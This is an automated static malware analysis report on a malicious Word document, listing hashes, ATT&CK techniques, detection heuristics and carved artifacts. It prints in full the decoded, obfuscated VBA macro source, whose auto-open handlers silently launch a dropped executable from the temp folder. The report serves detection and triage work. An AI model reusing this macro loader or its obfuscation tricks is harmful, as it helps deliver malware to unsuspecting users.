Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d39fdc3659a2ddd3…

MALICIOUS

Office (OLE)

187.0 KB Created: 2016-03-01 11:31:00 Authoring application: Microsoft Office Word First seen: 2016-03-10
MD5: d9c642068c99f1caac630726f39be3d7 SHA-1: 7e5051f340868aed523dce12cb27e7899b41502b SHA-256: d39fdc3659a2ddd3e388fdde6e85a55a8af5331c2b6b716884a7bd92afb07de2
654 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1505.003 Server Software Component: Exploit Public-Facing Application T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample is a malicious Office document containing obfuscated VBA macros. These macros are designed to execute an embedded PE executable, identified as 'embedded_office_00006250.exe'. The macros also attempt to save this executable to the path 'C:\Aaaa\exe\idd2.exe', indicating a payload delivery and execution attempt.

Heuristics 17

  • ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: BC.Win.Packer.Troll-14
  • XOR-encoded strings (key 0xFA) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xFA: 'advapi32.dll', 'wininet.dll', 'shell32.dll', 'shlwapi.dll', 'KERNEL32.DLL', 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    Attempted x86 opcode disassembly
    00015F47  9b                wait
00015F48  9e                sahf
00015F49  8c9b8a93c9c8      mov word ptr [ebx - 0x37366c76], ds
00015F4F  d49e              aam 0x9e
00015F51  96                xchg esi, eax
00015F52  96                xchg esi, eax
00015F53  fa                cli
00015F54  95                xchg ebp, eax
00015F55  96                xchg esi, eax
00015F56  9f                lahf
00015F57  c9                leave
00015F58  c8d49e96          enter -0x612c, -0x6a
00015F5C  96                xchg esi, eax
00015F5D  fa                cli
00015F5E  89929f9696c9      mov dword ptr [edx - 0x36696961], edx
00015F64  c8d49e96          enter -0x612c, -0x6a
00015F68  96                xchg esi, eax
00015F69  fa                cli
00015F6A  8992968d9b8a      mov dword ptr [edx - 0x7564726a], edx
00015F70  93                xchg ebx, eax
00015F71  d49e              aam 0x9e
00015F73  96                xchg esi, eax
00015F74  96                xchg esi, eax
00015F75  fa                cli
00015F76  8f                .byte 0x8f
00015F77  8896979594d4      mov byte ptr [esi - 0x2b6b6a69], dl
00015F7D  9e                sahf
00015F7E  96                xchg esi, eax
00015F7F  96                xchg esi, eax
00015F80  fa                cli
00015F81  8f                .byte 0x8f
00015F82  899f88c9c8d4      mov dword ptr [edi - 0x2b373678], ebx
00015F88  9e                sahf
00015F89  96                xchg esi, eax
00015F8A  96                xchg esi, eax
00015F8B  fa                cli
00015F8C  8f                .byte 0x8f
00015F8D  899f889f948c      mov dword ptr [edi - 0x736b6078], ebx
00015F93  d49e              aam 0x9e
00015F95  96                xchg esi, eax
00015F96  96                xchg esi, eax
00015F97  fa                cli
00015F98  8d939493949f      lea edx, [ebx - 0x606b6c6c]
00015F9E  8ed4              mov ss, esp
00015FA0  9e                sahf
00015FA1  96                xchg esi, eax
00015FA2  96                xchg esi, eax
00015FA3  fa                cli
00015FA4  8d                .byte 0x8d
00015FA5  89                .byte 0x89
00015FA6  95                xchg ebp, eax
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    urh = Shell(bbe, 0)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set ygBvdgwQw = CreateObject(WejndHw(23 + 64) & "o" + "rd.Applicatio" + "n" + "")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ygBvdgwQw = CreateObject(WejndHw(23 + 64) & "o" + "rd.Applicatio" + "n" + "")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TTGVDW = Environ(BBBDGW) + YGBASDW
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2122 bytes
SHA-256: f6d70b144b17be9cbb2f9c98cf6f6ac8589f879108c3cf4191e2593da6ec44ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Rotkw()
    Donnj
End Sub
Sub Donnj()
Dim fdaa As Integer
Dim nytr As Boolean, FDFWQD As String
UWSBDS = DatePart("yyyy", "11/10/3117")
UWSBDS = Right(UWSBDS, 1)
BBBDGW = "EM"
fdaa = 7 - 8
nytr = False
On Error Resume Next
YGBASDW = Right("\nfjd\", 1)
BBBDGW = "T" & BBBDGW & Chr(80)
TTGVDW = Environ(BBBDGW) + YGBASDW
RTQCDW = WejndHw(40 + 6)
RREW = RTQCDW + WejndHw(8 + 94 + fdaa)
RREW = RREW & "x" + WejndHw(10 + 81 + 10)
UUIIW = RTQCDW & WejndHw(-6 + 110 + 10) & WejndHw(4 + 110 + 2) + "f"
NFUQWD = TTGVDW

BBBVQWGD = TTGVDW + "fuewq" + UUIIW
DDDHUQWD = TTGVDW + "fbywuq" + UUIIW
FDFWQD = NFUQWD + "idd2" & RREW

Bhgwygd (BBBVQWGD)
Bhgwygd (DDDHUQWD)
Dim hf As Integer
hf = 2
Module1.Godfa (hf)
QWJDQ = TTGVDW + "fuewq" & ".r" & "tf"
VJNASD = "'qpwod 'qlw;kd;q"

Set ygBvdgwQw = CreateObject(WejndHw(23 + 64) & "o" + "rd.Applicatio" + "n" + "")
ygBvdgwQw.Visible = nytr
ygBvdgwQw.Documents.Open (QWJDQ)
Module1.Godfa (2)
HYUASGD = Module1.Trwnw(FDFWQD)
Module1.Godfa (3)
ygBvdgwQw.Quit
Set ygBvdgwQw = Nothing
End Sub
Public Function WejndHw(vbhs As Integer)
    WejndHw = Chr(vbhs)
End Function
Sub Workbook_Open()
    Donnj
End Sub
Sub AutoOpen()
    UQBDWD = ";l12ke ;1lks"
    Rotkw
End Sub
Public Function Bhgwygd(bvhd As String)
ActiveDocument.SaveAs FileName:=bvhd, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    Donnj
End Sub














Attribute VB_Name = "Module1"
Sub Godfa(Tybe As Long)
VBHJSD = "alsj kdlsa"
Dim Hbfw As Long

Dim Iunf As Long
Iunf = Tybe + Timer
Hbfw = Iunf
Do While Timer < Hbfw
DoEvents
Loop
End Sub
Public Function Trwnw(bbe As String)
Dim urh As Variant
urh = Shell(bbe, 0)
End Function
Public Function Abchsdsa(qdasw As String)
Abchsdsa = Right(qdasw, 1)
End Function
embedded_office_00006250.exe embedded-pe Office MZ+PE at offset 0x6250 166320 bytes
SHA-256: cee8a12a790084dd5d5eb99d66c1c3df388b9bb2959e9633a9b339d82510c300
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1518358960/Ole10Native 143570 bytes
SHA-256: da1a06d9ff67c0823b79a2f04941964056fb564fd71a174481388521be9b5890
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.